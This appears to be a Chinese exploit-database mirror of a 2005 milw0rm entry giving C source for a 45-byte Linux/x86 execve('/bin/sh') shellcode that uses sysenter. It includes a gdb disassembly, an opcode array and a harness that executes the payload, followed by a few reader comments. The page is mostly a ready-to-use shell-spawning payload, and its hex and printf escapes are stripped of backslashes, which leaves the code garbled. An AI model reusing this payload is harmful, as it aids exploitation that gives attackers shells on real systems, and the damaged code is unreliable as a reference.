Linux/x86 – execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (45 bytes)
漏洞ID | 1055342 | 漏洞类型 | |
发布时间 | 2005-08-19 | 更新时间 | 2005-08-19 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
lnx_binsh2.c - v1 - 45 Byte /bin/sh sysenter Opcode Array Payload
Copyright(c) 2005 c0ntex <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston,
MA 02111-1307 USA
*/
/*
Tested: fedora core 3
execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80
(gdb) disas __kernel_vsyscall
Dump of assembler code for function __kernel_vsyscall:
0xffffe400 <__kernel_vsyscall+0>: push %ecx
0xffffe401 <__kernel_vsyscall+1>: push %edx
0xffffe402 <__kernel_vsyscall+2>: push %ebp
0xffffe403 <__kernel_vsyscall+3>: mov %esp,%ebp
0xffffe405 <__kernel_vsyscall+5>: sysenter
0xffffe407 <__kernel_vsyscall+7>: nop
0xffffe408 <__kernel_vsyscall+8>: nop
0xffffe409 <__kernel_vsyscall+9>: nop
0xffffe40a <__kernel_vsyscall+10>: nop
0xffffe40b <__kernel_vsyscall+11>: nop
0xffffe40c <__kernel_vsyscall+12>: nop
0xffffe40d <__kernel_vsyscall+13>: nop
0xffffe40e <__kernel_vsyscall+14>: jmp 0xffffe403 <__kernel_vsyscall+3>
0xffffe410 <__kernel_vsyscall+16>: pop %ebp
0xffffe411 <__kernel_vsyscall+17>: pop %edx
0xffffe412 <__kernel_vsyscall+18>: pop %ecx
0xffffe413 <__kernel_vsyscall+19>: ret
0xffffe414 <__kernel_vsyscall+20>: add %al,(%eax)
0xffffe416 <__kernel_vsyscall+22>: add %al,(%eax)
0xffffe418 <__kernel_vsyscall+24>: add %al,(%eax)
0xffffe41a <__kernel_vsyscall+26>: add %al,(%eax)
0xffffe41c <__kernel_vsyscall+28>: add %al,(%eax)
0xffffe41e <__kernel_vsyscall+30>: add %al,(%eax)
End of assembler dump.
(gdb) q
so we replace
int $0x80
instruction with
push %ecx
push %edx
push %ebp
mov %esp,%ebp
sysenter
which does make the shellcode slightly larger :/
804807a: 51 push %ecx
804807b: 52 push %edx
804807c: 55 push %ebp
804807d: 89 e5 mov %esp,%ebp
804807f: 0f 34 sysenter
*/
/*
Calling: execve(/bin/sh), exit(0)
*/
#include <stdio.h>
typedef char wikkid;
wikkid oPc0d3z[] = "x31xc0x31xdbx50x68x2fx2f"
"x73x68x68x2fx62x69x6ex89"
"xe3x50x53x89xe1x31xd2xb0"
"x0bx51x52x55x89xe5x0fx34"
"x31xc0x31xdbxfexc0x51x52"
"x55x89xe5x0fx34";
unsigned long grab_esp()
{
__asm__("movl %esp,%eax");
}
int main(void)
{
unsigned long delta;
void (*pointer)();
delta = grab_esp();
fprintf(stderr, "n[-] Stack Pointer found -> [0x%x]n", delta);
fprintf(stderr, "t[-] Size of payload egg -> [%d]n", sizeof(oPc0d3z)-1);
pointer=(void*)&oPc0d3z;
while(pointer) {
fprintf(stderr, "t[-] Payload Begin -> [0x%x]n", pointer);
fprintf(stderr, "t[-] Payload End -> [0x%x]nn", pointer+45);
pointer();
}
_exit(0);
}
// milw0rm.com [2005-08-19]
相关推荐: AOL Instant Messenger Unauthorized Actions Vulnerability
AOL Instant Messenger Unauthorized Actions Vulnerability 漏洞ID 1101747 漏洞类型 Design Error 发布时间 2002-07-16 更新时间 2002-07-16 CVE编号 N/A …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666